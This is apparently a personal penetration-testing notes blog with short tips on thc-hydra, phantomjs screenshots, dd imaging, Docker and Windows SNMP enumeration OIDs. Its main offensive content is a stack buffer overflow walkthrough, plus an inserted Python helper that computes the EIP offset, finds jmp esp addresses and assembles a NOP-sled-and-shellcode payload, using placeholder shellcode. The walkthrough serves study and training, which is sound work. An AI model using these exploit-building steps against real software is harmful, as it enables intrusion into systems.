Friday, November 6, 2015

thc-hydra

[VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol

The default thc-hydra package on Kali at the time of this post is not compiled with SSL support, which is why the SSL session fails before any login attempt. Download the thc-hydra source and compile it yourself to get SSL working.

Thursday, October 29, 2015

Kali - peepingtom + capture.js + phantomjs problems

At the time of this post, I experienced the following problems getting peepingtom and phantom.js up and running:

Step 1:
Compile phantomjs from source.  If ./build.sh fails with out-of-memory errors, increase your swap space; follow the directions on this blog:

https://www.digitalocean.com/community/tutorials/how-to-add-swap-on-ubuntu-14-04


Step 2:
Copy the built binary to /usr/bin/phantomjs

Step 3:
Modify peepingtom's capture.js to the following:


var page = require('webpage').create(),
    url, filename;

// phantom.args was removed in PhantomJS 2.x; read the arguments from the
// system module instead (args[0] is the script name).
var args = require('system').args;
url = args[1];
filename = args[2];
// url = phantom.args[0];
// filename = phantom.args[1];
page.viewportSize = { width: 800, height: 600 };
page.clipRect = { top: 0, left: 0, width: 800, height: 600 };
page.open(url, function (status) {
    // The status check is left disabled on purpose so a screenshot is still
    // written (e.g. of an error page) when the load does not report 'success'.
    //if (status !== 'success') {
    //    console.log('Unable to load the address!');
    //} else {
        window.setTimeout(function () {
            page.render(filename);
            phantom.exit();
        }, 200);
    //}
});

Wednesday, July 22, 2015

Windows Infections without tools

http://909research.com/find-a-windows-infection-quickly-without-tools/

Tuesday, July 21, 2015

VirtualBox Ubuntu stuck on 640x480

sudo apt-get install virtualbox-guest-dkms

dd

sudo dd if=/dev/sdc conv=sync,noerror of=/home/backup.img bs=64K

conv=noerror keeps dd going past unreadable sectors instead of aborting, and conv=sync pads each short or failed read with zeros to the full block size, so every block in the image stays at the same offset as on the disk (an unreadable block simply comes out zero-filled). Without sync, the data after a bad block slides back and the image no longer lines up with the disk. Use the same options for the restore:


sudo dd if=/home/backup.img of=/dev/sdb conv=sync,noerror bs=64K

Note that with conv=sync the image is padded to a multiple of bs, so it can be slightly larger than the source disk; checksum the image against the disk (ignoring the trailing padding) before relying on it.
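The effect of conv=noerror and conv=sync is easier to see on a toy than on a real disk. The following is an added example, not part of the original post and not dd itself: a small Python model of dd's read loop run against a constructed 19-byte "device" with one unreadable 4-byte block (the block size, sample data and bad block are all made up for the example), plus the padded-image integrity check described above.

```python
import hashlib

# Added example, not from the original post: a model of dd's read loop that
# shows what conv=noerror and conv=sync do when a source block cannot be read.
# The "device", its contents and its bad block are constructed for the example;
# real dd works on block devices with bs=64K as in the commands above.

BS = 4                                  # tiny block size for readability
SAMPLE = b"0123456789ABCDEF" + b"XYZ"   # 19 bytes: 4 full blocks plus a short tail


class FlakyDevice:
    """Stand-in for a disk with one unreadable block: read() raises there,
    but the position still advances past it, as the next read on a disk would."""

    def __init__(self, data, bad_block, bs):
        self.data, self.bad_block, self.bs, self.pos = data, bad_block, bs, 0

    def read(self, n):
        block = self.pos // self.bs
        chunk = self.data[self.pos:self.pos + n]
        self.pos += len(chunk)
        if block == self.bad_block and chunk:
            raise IOError("Input/output error")
        return chunk


def dd_copy(src, bs, noerror=True, sync=True):
    """dd's loop: read bs bytes at a time until EOF.
    noerror: keep going after a read error instead of aborting.
    sync:    pad a short or failed read with NULs to bs, so every output block
             sits at the same offset as the input block it came from."""
    out = bytearray()
    while True:
        try:
            chunk = src.read(bs)
        except IOError:
            if not noerror:
                raise
            chunk = None            # error: nothing read, but not EOF
        if chunk == b"":
            break                   # EOF
        chunk = chunk or b""
        if sync:
            chunk = chunk.ljust(bs, b"\x00")
        out += chunk
    return bytes(out)


def make_image(sync, bad_block=1):
    """Image the constructed device with conv=noerror and, optionally, conv=sync."""
    return dd_copy(FlakyDevice(SAMPLE, bad_block, BS), BS, noerror=True, sync=sync)


def image_matches(image, original, bs):
    """Integrity check for an image made with conv=sync: the data must hash the
    same, and the only extra bytes are the NUL padding of the last partial block."""
    pad = (-len(original)) % bs
    return (hashlib.sha256(image[:len(original)]).digest()
            == hashlib.sha256(original).digest()
            and image[len(original):] == b"\x00" * pad)


if __name__ == "__main__":
    aligned = make_image(sync=True)
    shifted = make_image(sync=False)
    print("sync   :", aligned[8:12], "at offset 8, same as disk:", SAMPLE[8:12])
    print("no sync:", shifted[8:12], "at offset 8, data slid back one block")
    print("clean device, padded image verifies:",
          image_matches(make_image(True, None), SAMPLE, BS))
```

With sync the bad block becomes four zero bytes and offset 8 still holds the disk's offset-8 data; without sync the image is a block shorter and everything after the bad block is misaligned. image_matches shows the checksum comparison that must skip the trailing padding conv=sync adds.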

Wednesday, July 8, 2015

Start another shell session on same container in Docker

docker exec -it <id of running container> bash

Thursday, July 2, 2015

Interactive Regex tester

https://regex101.com/#python

OSX FW Config

https://discussions.apple.com/thread/6645172

Refresher buffer overflow

1.  Fuzz the target input until it crashes.
2.  Attach Immunity Debugger to the process.
3.  Confirm that EIP is overwritten with your input at the crash.
4.  Use /usr/share/metasploit-framework/tools/pattern_create.rb [length] to generate a unique pattern of the crashing length and send it instead.
5.  Note the value left in EIP at the crash.
6.  Use /usr/share/metasploit-framework/tools/pattern_offset.rb [value] with that EIP value to get the offset of the overwrite in your buffer.
7.  Use this offset as the new base length: filler up to the offset, then the 4 bytes that land in EIP.
8.  Find out whether any characters are restricted (bad characters) for the payload: send \x01-\xff after the EIP overwrite and compare what lands in memory with what was sent.
9.  !mona modules in Immunity Debugger to list the loaded modules.  Pick one without protections (Rebase, SafeSEH, ASLR and NXCompat all False) whose address range does not include null bytes or other bad characters.
10. Find a jmp esp instruction to use as the return address:
10.a  Use /usr/share/metasploit-framework/tools/nasm_shell.rb to get the opcode for jmp esp:
nasm > jmp esp 
00000000 FFE4      jmp esp

11.  Search for this opcode in the chosen module with mona:  !mona find -s "\xff\xe4" -m slmfc.dll

12.  Select an address that contains no bad characters; double-click it to double check that the bytes at that address really are FF E4.
13.  Put this address, packed little-endian, in the 4 bytes that overwrite EIP.
14.  To validate, set a breakpoint at the jmp esp address and run the exploit again to make sure the breakpoint is hit.

15.  Add the shellcode (generated with the bad characters excluded) after the EIP overwrite, preceded by a short NOP sled, so that jmp esp lands in it.
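As an added example (not part of the original post, and not the Metasploit or mona tooling it refers to), the Python below reimplements the offline parts of the steps above: the cyclic pattern of pattern_create.rb and the offset lookup of pattern_offset.rb, the bad-character comparison of step 8, the jmp esp search of step 11, and the final payload layout of steps 13-15. The module bytes, base address and shellcode are constructed for the example and do not come from any real binary; the EIP value 39694438 is just an illustrative debugger reading.

```python
import struct

# Added example, not the page's own tooling: a pure-Python stand-in for the
# pattern_create.rb / pattern_offset.rb / "!mona find" steps, plus the payload
# layout. All addresses, module bytes and shellcode are constructed for the
# example and do not come from any real binary.

JMP_ESP = b"\xff\xe4"   # opcode nasm_shell.rb prints for "jmp esp"


def pattern_create(length):
    """Same cyclic pattern as pattern_create.rb (Aa0Aa1Aa2...Zz9): every
    4-byte substring is unique, so 4 bytes of it pin down an offset."""
    parts = []
    for up in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lo in "abcdefghijklmnopqrstuvwxyz":
            for dg in "0123456789":
                parts.append(up + lo + dg)
                if len(parts) * 3 >= length:
                    return "".join(parts)[:length].encode()
    return "".join(parts)[:length].encode()


def pattern_offset(eip_hex, length):
    """Offset in the pattern of the value the debugger shows in EIP (e.g. '39694438').
    x86 is little-endian, so the bytes in memory are the reverse of the printed
    value. Returns -1 if EIP was not overwritten by pattern bytes."""
    needle = struct.pack("<I", int(eip_hex, 16))
    return pattern_create(length).find(needle)


def first_bad_char(sent, dumped):
    """Step 8: compare the probe bytes sent with what the debugger shows in memory.
    Returns the first byte that was altered or truncated (None if all survived).
    Bytes after a bad one are often mangled too, so drop it and probe again."""
    for i, (s, d) in enumerate(zip(sent, dumped)):
        if s != d:
            return sent[i]
    if len(dumped) < len(sent):
        return sent[len(dumped)]   # input was cut short at this byte
    return None


def find_jmp_esp(module_bytes, module_base, bad_chars=b"\x00"):
    """Step 11: like '!mona find -s "\\xff\\xe4" -m <dll>', return every address
    of a jmp esp in the module whose little-endian encoding avoids bad characters."""
    hits = []
    off = module_bytes.find(JMP_ESP)
    while off != -1:
        addr = module_base + off
        if not any(b in bad_chars for b in struct.pack("<I", addr)):
            hits.append(addr)
        off = module_bytes.find(JMP_ESP, off + 1)
    return hits


def build_payload(offset, ret_addr, shellcode, nops=16):
    """Steps 13-15: filler up to EIP, the jmp esp address, then a NOP sled and
    the shellcode, which sit where ESP points after the ret that loaded EIP."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode


# Constructed "module": a jmp esp at offset 0x1234 (address 0x5f401234, no null
# byte) and a second one at offset 0x1300 whose address 0x5f401300 contains 0x00.
MODULE_BASE = 0x5F400000
MODULE_BYTES = b"\x90" * 0x1234 + JMP_ESP + b"\x90" * (0x1300 - 0x1236) + JMP_ESP
SHELLCODE = b"\xcc" * 4   # placeholder int3 breakpoints standing in for msfvenom output


if __name__ == "__main__":
    offset = pattern_offset("39694438", 3000)                 # 2606 for this EIP value
    probe = bytes(range(1, 256))                              # \x01..\xff; never send \x00
    bad = first_bad_char(probe, probe.replace(b"\x0a", b""))  # pretend \x0a was eaten
    ret = find_jmp_esp(MODULE_BYTES, MODULE_BASE, bad_chars=bytes([0, bad]))[0]
    payload = build_payload(offset, ret, SHELLCODE)
    print("offset=%d bad=%#x ret=%#x len=%d" % (offset, bad, ret, len(payload)))
```

The second jmp esp is rejected because its address ends in 0x00, which is exactly the filter mona applies when you give it bad characters; the first survives and is packed little-endian into the payload at the offset the pattern search found.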

Tuesday, June 23, 2015

Common Microsoft Windows SNMP parameters

OID                          Description
1.3.6.1.2.1.25.1.6.0         System processes (hrSystemProcesses)
1.3.6.1.2.1.25.4.2.1.2       Running programs (hrSWRunName)
1.3.6.1.2.1.25.4.2.1.4       Process paths (hrSWRunPath)
1.3.6.1.2.1.25.2.3.1.4       Storage units (hrStorageAllocationUnits)
1.3.6.1.2.1.25.6.3.1.2       Software name (hrSWInstalledName)
1.3.6.1.4.1.77.1.2.25        User accounts (LanMgr svUserName)
1.3.6.1.2.1.6.13.1.3         TCP local ports (tcpConnLocalPort)